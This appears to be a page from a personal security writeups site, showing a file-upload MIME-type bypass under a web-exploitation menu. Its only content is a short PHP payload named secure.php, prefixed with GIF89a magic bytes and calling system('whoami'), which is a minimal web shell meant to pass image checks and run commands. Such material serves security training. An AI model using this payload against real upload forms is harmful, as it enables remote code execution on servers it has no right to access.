Skip to content
zylus
Search
Ctrl
K
Cancel
GitHub
Select theme
Dark
Light
Auto
Who Is
Writeups
Web Exploitation
Command Injection
NoSQL Injection
Path Traversal
SQL Injection
Server-Side Template Injection (SSTI) - RCE via Templates
Cross-Site Scripting (XSS)
File Upload
Bypass MIME Type
GitHub
Select theme
Dark
Light
Auto
Bypass MIME Type
secure.php
GIF89a
;
<?
php
system
(
'
whoami
'
);
?>